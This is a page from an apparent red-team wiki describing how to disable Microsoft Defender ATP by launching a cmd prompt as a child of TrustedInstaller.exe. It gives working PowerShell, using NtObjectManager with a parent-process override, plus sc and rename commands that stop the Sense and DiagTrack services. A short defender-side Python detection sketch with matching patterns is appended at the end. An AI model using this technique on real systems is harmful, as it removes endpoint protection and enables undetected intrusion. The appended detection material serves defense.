The Red Team Vade Mecum
Trusted Installer

Last updated 3 years ago

MsSense runs as a Protected Process Light (PPL) service, meaning that even with SYSTEM privileges we will not be able to stop it.

However, Microsoft allows "trusted callers" to manage protected services and other critical resources in the system. This "trusted caller" is a service called TrustedInstaller.

You may have seen this service while looking at the ACLs of certain applications:

As you can see, it is given full control of calc.exe, and it is the only service that has full control.

It is also given full control over every svchost.exe, which is what hosts the DiagTrack service binary.

TrustedInstaller itself is a service that does not have PPL configured:

So does that mean we can just change TrustedInstaller's binary path to stop the ATP Sense service?

sc config TrustedInstaller binPath= "cmd /C sc stop sense" && sc start TrustedInstaller

Well, you can't: this is already a known technique that ATP is aware of, and it will raise an alert if you try it.

Alright, so we know that TrustedInstaller is a service configured without PPL. We could therefore spawn a cmd prompt with TrustedInstaller.exe as its parent (the child inherits the parent's primary token), and use that cmd prompt to disable the ATP service.

Why this works is explained in this picture:

To do this, we need SeDebugPrivilege (which you can enable if you are an administrator).

We will use PowerShell and two .NET DLLs from James Forshaw that ease the whole process for us: NtObjectManager.dll and NtApiDotNet.dll.

You can find these DLLs in the googleprojectzero/sandbox-attacksurface-analysis-tools repository on GitHub.

These DLLs will not trigger any alerts, because they are legitimate code that simply wraps the low-level Windows API.

We will first load those two DLLs into memory. Assembly::Load takes the raw bytes of the assembly, so $NtObjectBytes and $NtApiBytes below hold the contents of each DLL (for example read with [IO.File]::ReadAllBytes):

$a = [System.Reflection.Assembly]::Load($NtObjectBytes)
$b = [System.Reflection.Assembly]::Load($NtApiBytes)

We will then import the loaded assemblies:

Import-Module $a
Import-Module $b

We will then enable the SeDebug privilege:

$token = Get-NtToken -Primary   # primary token of the current (admin) PowerShell process
$token.SetPrivilege([NtApiDotNet.TokenPrivilegeValue[]]"SeDebugPrivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled")

And then launch the TrustedInstaller process and get a handle to it:

Start-Service TrustedInstaller
$handle = Get-NtProcess -Name "TrustedInstaller.exe"

We will then call the CreateProcess method to launch cmd.exe with TrustedInstaller.exe as its parent process.

$config = New-Object NtApiDotNet.Win32.Win32ProcessConfig
$config.CommandLine = "cmd"
$config.CreationFlags = [NtApiDotNet.Win32.CreateProcessFlags]16   # 16 = CREATE_NEW_CONSOLE
$config.ParentProcess = $handle                                     # the TrustedInstaller.exe handle obtained above
[NtApiDotNet.Win32.Win32Process]::CreateProcess($config)

Then our cmd prompt will pop up!

From there, we can just stop the MsSense and DiagTrack services:

C:\Windows\System32> sc config diagtrack binpath= "ploopy"
C:\Windows\System32> sc stop diagtrack

Or just rename the executable:

rename "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" blah

This will effectively stop the ATP process.
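A defender-side example, added here and not part of the original page: it replays constructed Sysmon-style process-creation records and flags the two traces this chain leaves, a non-standard child of TrustedInstaller.exe and sc.exe reconfiguring or stopping the Sense, DiagTrack or TrustedInstaller services. The expected-children set and the sample events are assumptions.

```python
import re

# Assumption: children TrustedInstaller.exe legitimately launches; tune per
# environment (TiWorker.exe is the Windows Modules Installer worker).
EXPECTED_TI_CHILDREN = {"tiworker.exe"}

# sc.exe reconfiguring or stopping one of the services touched on this page.
SC_PATTERN = re.compile(
    r"\bsc(?:\.exe)?\s+(config|stop|delete)\s+(sense|diagtrack|trustedinstaller)\b",
    re.IGNORECASE,
)

# Constructed sample events shaped like Sysmon Event ID 1 (process create).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\servicing\TrustedInstaller.exe",
     "CommandLine": "cmd"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'sc config TrustedInstaller binPath= "cmd /C sc stop sense"'},
    {"Image": r"C:\Windows\System32\sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'Sc config diagtrack binpath= "ploopy"'},
    {"Image": r"C:\Windows\servicing\TiWorker.exe",
     "ParentImage": r"C:\Windows\servicing\TrustedInstaller.exe",
     "CommandLine": "TiWorker.exe -Embedding"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: dict) -> list[str]:
    """Reasons (possibly none) why one event matches this technique."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent == "trustedinstaller.exe" and child not in EXPECTED_TI_CHILDREN:
        reasons.append(f"unexpected child of TrustedInstaller.exe: {child}")
    m = SC_PATTERN.search(event.get("CommandLine", ""))
    if m:
        reasons.append(f"sc {m.group(1).lower()} against {m.group(2).lower()} service")
    return reasons

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := evaluate(e))]
```

A rename of SenseCncProxy.exe is a file event rather than a process event, so it needs a separate file-system rule (Sysmon Event ID 11 or similar) that this block does not cover.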
